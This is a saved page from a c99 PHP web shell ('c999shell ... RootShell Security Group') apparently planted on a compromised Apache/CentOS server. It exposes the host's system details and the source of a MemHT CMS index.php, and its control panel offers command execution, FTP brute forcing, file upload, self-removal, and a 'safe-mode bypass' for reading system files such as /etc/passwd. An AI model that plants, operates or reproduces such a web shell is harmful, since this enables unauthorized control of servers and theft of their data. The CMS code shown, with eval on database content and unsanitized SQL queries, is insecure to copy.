!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (14.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 (GPLv2)
	or write to the Free Software Foundation, Inc., 51 Franklin Street,
	Fifth Floor, Boston, MA02110-1301, USA.
		
********************************************************************************/

//===========================================
//LOAD TIME i
//===========================================
$mtime = microtime();
$mtime = explode(" ",$mtime);
$starttime = $mtime[1] + $mtime[0];

//===========================================
//COMPRESSION
//===========================================
if (extension_loaded('zlib')) {
	@ini_set('zlib.output_compression_level',6);
	ob_start('ob_gzhandler');
}

//===========================================
//CHECK IF MEMHT IS INSTALLED
//===========================================
if (!file_exists("inc/inc_config.php")) {
	if (file_exists("install/index.php")) {
		header("Location: install/index.php");
	} else {
		die("
Attention: The configuration file is missing and a new installation cannot be started because the install file cannot be located
"); } } else if (file_exists("install/index.php")) { die("
Attention: Delete the installation folder and files!
"); } //=========================================== //DATABASE: CONNECT //=========================================== require_once("inc/inc_config.php"); require_once("inc/inc_database.php"); $dblink = new database(); $dblink->connect(); //=========================================== //TIMEZONE SETTING + DATABASE CHECK //=========================================== $timezonerow = $dblink->get_row("SELECT timezone FROM memht_config") or die("
Attention: Cannot find database tables!
"); $siteConfig['timezone'] = intval($timezonerow['timezone']); $tzNOW = "DATE_ADD(NOW(),INTERVAL ".$siteConfig['timezone']." HOUR)"; //=========================================== //INCLUDES //=========================================== require_once("inc/inc_login.php"); require_once("inc/inc_functions.php"); require_once("inc/inc_bbcode.php"); require_once("inc/inc_readConfig.php"); require_once("inc/inc_getinfo.php"); require_once("inc/inc_statistics.php"); require_once("inc/inc_ban.php"); include_once("inc/inc_banners.php"); include_once("inc/inc_online.php"); include_once("inc/inc_htmlclean.php"); //=========================================== //MODREWRITE + HTML Cleaner //=========================================== if ($siteConfig['modrewrite']==1) { include_once("inc/inc_modrewrite.php"); ob_start(replace_for_mod_rewrite); } else { ob_start(replace_htmlclean); } //=========================================== //INITIALIZE TEMPLATE ENGINE //=========================================== include_once("inc/tpl/RainTPL.class.php"); $tpl = new RainTPL($template_directory="templates/".$siteConfig['template']); $tpl->assign("tpl_template",$siteConfig['template']); if (file_exists("templates/".$siteConfig['template']."/table.php")) { include_once("templates/".$siteConfig['template']."/table.php"); } else { function openTable($title="") { echo "
\n"; if ($title!="") { echo "
$title
\n"; } } function closeTable() { echo "
\n"; } } function page_title() {} //DEPRECATED function page_title_blank() {} //DEPRECATED //=========================================== //SELECT LANGUAGE //=========================================== include_once (file_exists("lang/".$siteConfig['language'].".php")) ? "lang/".$siteConfig['language'].".php" : "lang/".$siteConfig['default_language'].".php" ; global $pagetitle,$virtualpagerequest,$rankPage,$enabledPage,$userid,$userInfo; //=========================================== //ERROR REPORTING //=========================================== if (isAuth($userid,3)) { error_reporting(E_ALL); } else { error_reporting(0); } $error_handler = set_error_handler("memhtErrorHandler"); if ($siteConfig['site_open']==1 OR isAuth($userid,3)) { //HEADER include_once("inc/inc_header.php"); //MAIN if (isset($_GET['page'])) { $page = inCode($_GET['page']); ob_start(); if (validate($page)) { //OPEN THE SELECTED PAGE if (file_exists("pages/$page/index.php") AND ($enabledPage==1 OR isAuth($userid,3))) { if (myRank()>=$rankPage) { $open = true; if ($result = $dblink->get_list("SELECT groupid FROM memht_groups_pages WHERE page='$page'")) { $grouparr = array(); foreach ($result as $row) { $groupid = intval($row['groupid']); if ($dblink->get_num("SELECT id FROM memht_groups_members WHERE groupid=$groupid AND user=$userid AND standby=0 AND (permanent=1 OR expire > $tzNOW)")==0) { $open = false; $grouparr[] = $groupid; } } } else { $open = true; } if ($open) { if (file_exists("pages/$page/lang/".$siteConfig['language'].".php")) { include_once("pages/$page/lang/".$siteConfig['language'].".php"); } else if (file_exists("pages/$page/lang/".$siteConfig['default_language'].".php")) { include_once("pages/$page/lang/".$siteConfig['default_language'].".php"); } //-- define("_LOAD_PAGE_",1); if ($page=="mypage" AND $checkid>0 AND $checktitle!="") { $pagecontent['title'] = $checktitle; $pagecontent['url'] = "index.php?page=mypage&op=openPage&id=$checkid&title=".mem_urlencode($checktitle); } else { $pagecontent['title'] = $pagetitle; $pagecontent['url'] = "index.php?page=$page"; } $pagecontent['name'] = $page; include("pages/$page/index.php"); //-- } else { $pagecontent['title'] = _ACCESSDENIED_; $pagecontent['url'] = ""; $pagecontent['name'] = ""; openTable(); //ACCESS DENIED (group required) echo "
"._ACCESSDENIED_."
"; echo "
"._YOUHAVENOPERM_." "._TOACCESSTHISPAGE_."!
"; if (sizeof($grouparr)>0) { echo "
"._REQUIRED_.":
"; foreach ($grouparr as $groupid) { $row = $dblink->get_row("SELECT type,amount,name FROM memht_groups WHERE id=$groupid"); echo "
  - "._GROUP_.": ".$row['name'].""; switch (intval($row['type'])) { case 1: echo ": ".$row['amount']." "._FORUM_POSTS_; break; case 2: echo ": ".$row['amount']." "._CONTRIBUTES_." ("._NEWS_.","._FILES_.")"; break; } echo "
"; } echo "
"; } closeTable(); } } else { openTable(); //ACCESS DENIED (Login required) echo "
"._ACCESSDENIED_."
"; if ($rankPage==1) { echo "
"._YOUHAVENOPERM_." "._TOACCESSTHISPAGE_."!
"._DOTHE_." "._LOGIN_." "._OR_." "._REGISTER_." "._FORFREE_."
"; @session_start(); $_SESSION['redirect_url'] = "index.php?page=$page"; $_SESSION['redirect_age'] = time(); } closeTable(); } } else if ($virtualpagerequest AND ($enabledPage==1 OR isAuth($userid,3)) AND $siteConfig['virtualpages']==1) { //VIRTUAL PAGES (Added in 3.8.0) if (myRank()>=$rankPage) { $open = true; if ($result = $dblink->get_list("SELECT groupid FROM memht_groups_pages WHERE page='$page'")) { $grouparr = array(); foreach ($result as $row) { $groupid = intval($row['groupid']); if ($dblink->get_num("SELECT id FROM memht_groups_members WHERE groupid=$groupid AND user=$userid AND standby=0 AND (permanent=1 OR expire > $tzNOW)")==0) { $open = false; $grouparr[] = $groupid; } } } else { $open = true; } if ($open) { define("_LOAD_PAGE_",1); require_once("inc/inc_header.php"); $pagecontent['title'] = $pagetitle; $pagecontent['url'] = "index.php?page=$page"; $pagecontent['name'] = $page; openTable(); eval($pageContent); closeTable(); require_once("inc/inc_footer.php"); } else { $pagecontent['title'] = _ACCESSDENIED_; $pagecontent['url'] = ""; $pagecontent['name'] = ""; openTable(); //ACCESS DENIED (group required) echo "
"._ACCESSDENIED_."
"; echo "
"._YOUHAVENOPERM_." "._TOACCESSTHISPAGE_."!
"; if (sizeof($grouparr)>0) { echo "
"._REQUIRED_.":
"; foreach ($grouparr as $groupid) { $row = $dblink->get_row("SELECT type,amount,name FROM memht_groups WHERE id=$groupid"); echo "
  - "._GROUP_.": ".$row['name'].""; switch (intval($row['type'])) { case 1: echo ": ".$row['amount']." "._FORUM_POSTS_; break; case 2: echo ": ".$row['amount']." "._CONTRIBUTES_." ("._NEWS_.","._FILES_.")"; break; } echo "
"; } echo "
"; } closeTable(); } } else { openTable(); //ACCESS DENIED (Login required) echo "
"._ACCESSDENIED_."
"; if ($rankPage==1) { echo "
"._YOUHAVENOPERM_." "._TOACCESSTHISPAGE_."!
"._DOTHE_." "._LOGIN_." "._OR_." "._REGISTER_." "._FORFREE_."
"; @session_start(); $_SESSION['redirect_url'] = "index.php?page=$page"; $_SESSION['redirect_age'] = time(); } closeTable(); } } else { require_once("inc/inc_header.php"); $pagecontent['title'] = _PAGE_NOEXIST_ORINACTIVE_; $pagecontent['url'] = ""; $pagecontent['name'] = ""; openTable(); echo "
"._PAGE_NOEXIST_ORINACTIVE_."
"; closeTable(); require_once("inc/inc_footer.php"); } } else { //SUSPICIOUS PAGE NAME $pagecontent['title'] = _SYNTAX_ERROR_; $pagecontent['url'] = ""; $pagecontent['name'] = ""; openTable(); echo "
"._SYNTAX_ERROR_."
"; closeTable(); } $pagecontent['content'] = ob_get_contents(); ob_end_clean(); } else { //DEFAULT HOME ob_start(); define("_LOAD_PAGE_",1); if (memRunHooks('DefaultHome')) { include_once("pages/messages/index.php"); include_once("inc/inc_blocks_central.php"); if (file_exists("pages/".$siteConfig['defpage']."/index.php")) { include("pages/".$siteConfig['defpage']."/index.php"); } else if ($row = $dblink->get_row("SELECT content FROM memht_virtualpages WHERE name='".$siteConfig['defpage']."'")) { //VIRTUAL PAGES (Added in 3.8.0) eval(outCodeVP($row['content'])); } memRunHooks('DefaultHomeEnd'); } $pagecontent['title'] = ""; $pagecontent['url'] = "index.php?page=".$siteConfig['defpage']; $pagecontent['name'] = $siteConfig['defpage']; $pagecontent['content'] = ob_get_contents(); ob_end_clean(); } //FOOTER include_once("inc/inc_footer.php"); //BLOCKS include_once("inc/inc_blocks_nav.php"); include_once("inc/inc_blocks_extra.php"); $tpl->assign('tpl_page',$pagecontent); } else { //Site closed $siteinactive = ($siteConfig['offlinemsg']!="") ? $siteConfig['offlinemsg'] : _SITE_TEMP_INACTIVE_ ; die("
$siteinactive
"); } if ($siteConfig['usecronjobs']==0) { //MAINTENANCE $maintenance = new Maintenance(); $maintenance->All(); //NEWSLETTER sendNewsletter(); } //=========================================== //DRAW TEMPLATE //=========================================== $tpl->draw("home"); //=========================================== //CLEAN //=========================================== ob_end_flush(); //=========================================== //LOAD TIME e //=========================================== $mtime = microtime(); $mtime = explode(" ",$mtime); $mtime = $mtime[1] + $mtime[0]; $endtime = $mtime; $totaltime = sprintf("%01.2f",($endtime - $starttime)); $totaltime = explode(".",$totaltime); if ($totaltime[1]>=75) { $totaltime = ($totaltime[0]+1).".00"; } else if ($totaltime[1]>=50) { $totaltime = $totaltime[0].".75"; } else if ($totaltime[1]>=25) { $totaltime = $totaltime[0].".50"; } else if ($totaltime[1]>0) { $totaltime = $totaltime[0].".25"; } else { $totaltime = $totaltime[0].".00"; } if ($dblink->get_num("SELECT time FROM memht_statistics_loadtime WHERE time='$totaltime' LIMIT 1")>0) { $dblink->query("UPDATE memht_statistics_loadtime SET hits=hits+1 WHERE time='$totaltime'"); } else { $dblink->query("INSERT INTO memht_statistics_loadtime (time,hits,started) VALUES ('$totaltime',1,$tzNOW)"); } //=========================================== //DATABASE: DISCONNECT //=========================================== $dblink->disconnect(); ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--